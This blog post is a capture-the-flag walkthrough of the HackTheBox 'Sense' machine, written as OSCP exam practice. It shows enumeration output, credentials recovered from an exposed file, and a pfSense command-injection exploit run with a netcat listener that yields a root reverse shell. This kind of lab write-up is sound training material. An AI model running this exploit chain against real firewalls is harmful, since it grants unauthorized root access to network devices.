Road to OSCP 4: Sense HackTheBox

Sharghaas
8 min read · Dec 1, 2020


Follow along in my OSCP journey, this is my target 4 of the TJNULL’s OSCP list.

How to use this walkthrough?

To avoid the typical answer-on-a-plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.

Let’s go!

Enumeration

I use Tib3rius’ multi-threaded AutoRecon, which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and gives you a nice overview of the services scanned.

python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.60

I thought I might show what the output looks like for this machine in the scan/ folder:

-rw-r--r-- 1 kali kali    4076 Jun 24 19:40 _commands.log
-rw-r--r-- 1 kali kali 586 Jun 24 19:40 _errors.log
-rw-r--r-- 1 kali kali 5483 Jun 24 19:42 _full_tcp_nmap.txt
-rw-r--r-- 1 kali kali 8092 Jun 24 19:40 _manual_commands.txt
-rw-r--r-- 1 kali kali 318 Jun 24 19:41 _patterns.log
-rw-r--r-- 1 kali kali 3349 Jun 24 19:40 _quick_tcp_nmap.txt
-rw-r--r-- 1 kali kali 10256 Jun 24 19:41 tcp_443_http_nmap.txt
-rw-r--r-- 1 kali kali 912 Jun 24 19:52 tcp_443_gobuster.txt
-rw-r--r-- 1 kali kali 7225 Jun 24 19:40 tcp_443_https_index.html
-rw-r--r-- 1 kali kali 1795 Jun 24 20:10 tcp_443_https_nikto.txt
-rw-r--r-- 1 kali kali 479 Jun 24 19:40 tcp_443_https_robots.txt
-rw-r--r-- 1 kali kali 3713863 Jun 24 19:40 tcp_443_https_shot.png
-rw-r--r-- 1 kali kali 768 Jun 24 19:40 tcp_443_https_web.txt
-rw-r--r-- 1 kali kali 5896 Jun 24 19:40 tcp_443_sslscan.txt
-rw-r--r-- 1 kali kali 0 Jun 24 19:40 tcp_80_http_gobuster.txt
-rw-r--r-- 1 kali kali 147 Jun 24 19:40 tcp_80_http_index.html
-rw-r--r-- 1 kali kali 1127 Jun 24 19:55 tcp_80_http_nikto.txt
-rw-r--r-- 1 kali kali 3286 Jun 24 19:40 tcp_80_http_nmap.txt
-rw-r--r-- 1 kali kali 157 Jun 24 19:40 tcp_80_http_robots.txt
-rw-r--r-- 1 kali kali 3713863 Jun 24 19:40 tcp_80_http_shot.png
-rw-r--r-- 1 kali kali 1652 Jun 24 19:40 tcp_80_http_whatweb.txt
-rw-r--r-- 1 kali kali 2278 Jun 24 19:49 _top_20_udp_nmap.txt

So you get the nmap-specific scripts at the bottom and then the service-specific scripts above. You can obviously refine the tool or use your own tools afterwards, but it usually gives a really nice picture.

Nmap

While it runs, I usually look at the _quick_tcp_nmap.txt file until the _full_tcp_nmap.txt is ready.

PORT    STATE SERVICE    REASON         VERSION
80/tcp open http syn-ack ttl 63 lighttpd 1.4.35
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open ssl/https? syn-ack ttl 63

We got a web server; the HTTP version seems to redirect to HTTPS, but nothing more came out of that scan. Let’s explore them.

Web Server — 80/443

Let’s check the web application.

HINT

What are the main ideas to explore with this type of page?

.

.

.

.

The main ideas to test out in this type of situation:

  1. default credentials
  2. brute force
  3. SQL injection

In this case, pfSense probably isn’t a good target for brute force and SQLi because we would get banned. Let’s try to find the default credentials.

But that didn’t work.

We’ll need to find another path or find a way to bypass the brute-force restrictions…

What else did our scan bring back for us?

Gobuster

We notice one thing straight away: a lot of these files seem to have the same size as the index file, so they are probably not returning anything. But we do have some interesting files.

/changelog.txt (Status: 200) [Size: 271]
/classes (Status: 301) [Size: 0]
/css (Status: 301) [Size: 0]
/edit.php (Status: 200) [Size: 6689]
/exec.php (Status: 200) [Size: 6689]
/favicon.ico (Status: 200) [Size: 1406]
/graph.php (Status: 200) [Size: 6690]
/help.php (Status: 200) [Size: 6689]
/includes (Status: 301) [Size: 0]
/index.html (Status: 200) [Size: 329]
/index.php (Status: 200) [Size: 6690]
/installer (Status: 301) [Size: 0]
/javascript (Status: 301) [Size: 0]
/license.php (Status: 200) [Size: 6692]
/pkg.php (Status: 200) [Size: 6688]
/stats.php (Status: 200) [Size: 6690]
/status.php (Status: 200) [Size: 6691]
/system.php (Status: 200) [Size: 6691]
/themes (Status: 301) [Size: 0]
/tree (Status: 301) [Size: 0]
/widgets (Status: 301) [Size: 0]
/xmlrpc.php (Status: 200) [Size: 384]

Getting User and Root

changelog.txt


This doesn’t give up much, other than that there is a clear vulnerability that hasn’t been patched. Let’s look for pfSense exploits.

(Authenticated)pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection  | exploits/php/webapps/47413.py
(Authenticated) pfSense - Group Member Remote Com | exploits/unix/remote/43193.rb
(Authenticated) pfSense 2.1 build 20130911-1816 - Directory Trave | exploits/php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabilities | exploits/php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversal | exploits/php/webapps/39038.txt
pfSense 2.3.1_1 - Command Execution | exploits/php/webapps/43128.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Comm | exploits/php/webapps/43560.py
pfSense Community Edition 2.2.6 - Multiple Vulner | exploits/php/webapps/39709.txt

After removing all the cross-site scripting options, we are left with 2 non-Metasploit scripts that we can try straight away, but it seems that in all cases we’ll need to be authenticated for this to work.

Let’s continue to explore.

Tree

It seems that this is actually SilverStripe tree, a file-tree control component… not really sure how we can exploit or take advantage of it.

Let’s see if we can find any related exploits.

SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 3.6.2 - CSV Excel Macro Injection
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

At first it seems we might have found something, but these are really just related to the CMS from SilverStripe. And during our research to better understand the purpose of this software in pfSense, we stumbled upon this

It seems that this exposed tree is completely fine and empty of anything exploitable.

HINT

What are we missing? Is there a step in our enumeration that could be improved?

.

.

.

.

Our directory busting only tested the default gobuster wordlist; let’s try again with a larger list!

Let’s take this opportunity to play with different directory busters.

Feroxbuster

feroxbuster --url http://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -e -s 200

-w wordlist
-x extensions
-e extract links and make new requests based on findings
-s only display responses with a particular status code
Because we know that the previous directory busting returned a lot of redirects, looking only for 200 filters out all the 301s.
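As an added example (not part of the original walkthrough or any of the tools it uses), here is a small Python helper that does by script what the `-s 200` filter and the “same size as the index file” observation above do by eye: it parses gobuster-style result lines, keeps only the wanted status codes, and drops every path whose response size clusters with the bulk of the others, which on pfSense is the login page handed to unauthenticated requests. The sample lines are constructed from the gobuster listing earlier on the page; `parse` and `interesting` are names chosen here.

```python
import re

# Constructed sample in gobuster's output format, using the paths and
# sizes shown in the listing earlier in this walkthrough.
SAMPLE = """\
/changelog.txt (Status: 200) [Size: 271]
/classes (Status: 301) [Size: 0]
/edit.php (Status: 200) [Size: 6689]
/exec.php (Status: 200) [Size: 6689]
/favicon.ico (Status: 200) [Size: 1406]
/graph.php (Status: 200) [Size: 6690]
/help.php (Status: 200) [Size: 6689]
/index.html (Status: 200) [Size: 329]
/index.php (Status: 200) [Size: 6690]
/license.php (Status: 200) [Size: 6692]
/system.php (Status: 200) [Size: 6691]
/xmlrpc.php (Status: 200) [Size: 384]
"""

LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+\(Status:\s*(?P<status>\d+)\)\s+\[Size:\s*(?P<size>\d+)\]"
)


def parse(text):
    """Turn gobuster result lines into (path, status, size) tuples."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            hits.append((m["path"], int(m["status"]), int(m["size"])))
    return hits


def interesting(hits, keep_status=(200,), tolerance=5, min_cluster=3):
    """Status filter (what feroxbuster -s 200 does) plus a size filter:
    a path is dropped when at least `min_cluster` kept responses have a
    size within `tolerance` bytes of its own, i.e. it is one more copy
    of the same page rather than a distinct resource."""
    kept = [h for h in hits if h[1] in keep_status]
    sizes = [s for _, _, s in kept]
    return [
        path for path, _, size in kept
        if sum(abs(s - size) <= tolerance for s in sizes) < min_cluster
    ]


if __name__ == "__main__":
    for path in interesting(parse(SAMPLE)):
        print(path)
```

On the sample this leaves exactly the four outliers (changelog.txt, favicon.ico, index.html, xmlrpc.php), which is the shortlist the walkthrough digs into next.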

FFUF

kali@kali:/opt/fuff$ ./ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60/FUZZ -e ".txt,.php,.html"

-w wordlist
-u url
-e extensions

Did you spot the new item that looks very interesting?
Let’s check system-users.txt!

We got the credentials, now it’s your turn to play!

HINT

Let’s get inside and let’s try those exploits!

.

.

.

.

It seems that the password isn’t “company defaults” but pfsense, of course; this makes sense if you remember the default pfSense credentials shown earlier!

We get the version of pfSense running, so now it’s easy-peasy to select the correct exploit out of the list.

pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | exploits/php/webapps/43560.py

We can quickly copy the exploit into our directory using this command:

kali@kali:~/Documents/HTB/lab$ searchsploit -m exploits/php/webapps/43560.py

Let’s check the script to understand how to use it.

import argparse

'''
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Ensure you have started a listener to catch the shell before running!
'''
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument("--username", help = "pfsense Username")
parser.add_argument("--password", help = "pfsense Password")

Let’s follow the instructions and start with the listener:

kali@kali:~/Documents/HTB/lab$ nc -nlvp 5555
listening on [any] 5555 ...

We can now run the exploit!

kali@kali:~/Documents/HTB/lab/10.10.10.60/exploit$ python3 43560.py --username rohit --password pfsense --lhost attacking_ip --lport 5555 --rhost 10.10.10.60
CSRF token obtained
Running exploit...
Exploit completed
kali@kali:~/Documents/HTB/lab/10.10.10.60/exploit$

We go back to the listener… GG LET’S GOOOO, instant root!!

kali@kali:~/Documents/HTB/lab$ nc -nlvp 5555
listening on [any] 5555 ...
0connect to [10.10.14.46] from (UNKNOWN) [10.10.10.60] 61450
sh: can't access tty; job control turned off
# id
0id: not found
# whoami
root
# pwd
/var/db/rrd
# cd /root/
# ls
.cshrc
.first_time
.gitsync_merge.sample
.hushlogin
.login
.part_mount
.profile
.shrc
.tcshrc
root.txt
# cat root.txt
----------------------------------
# ifconfig
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=9b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM>
ether 00:50:56:b9:29:80
inet 10.10.10.60 netmask 0xffffff00 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:2980%em0 prefixlen 64 scopeid 0x1
nd6 options=1<PERFORMNUD>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
plip0: flags=8810<POINTOPOINT,SIMPLEX,MULTICAST> metric 0 mtu 1500
enc0: flags=0<> metric 0 mtu 1536
pfsync0: flags=0<> metric 0 mtu 1460
syncpeer: 224.0.0.240 maxupd: 128 syncok: 1
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
options=3<RXCSUM,TXCSUM>
inet 127.0.0.1 netmask 0xff000000
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x5
nd6 options=3<PERFORMNUD,ACCEPT_RTADV>
pflog0: flags=100<PROMISC> metric 0 mtu 33144

Let’s grab the root and user flags, but let’s not forget our “kill picture” (the ifconfig screenshot) as per OSCP exam regulations!

What did I learn?

  1. Explore things you have already done with different tools or wordlists. Fuzzing scenarios vary a lot, and some tools will perform better in different situations.

This was a simpler, more relaxed machine, but without using the right wordlist you could really fall into rabbit holes. Make sure to be thorough with your enumeration and you’ll avoid losing time!

Stream

I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.


Written by Sharghaas

Flying Squirrel that loves everything around hacking. Training for the OSCP exam come join me on my stream so we can struggle together twitch.tv/sharghaas
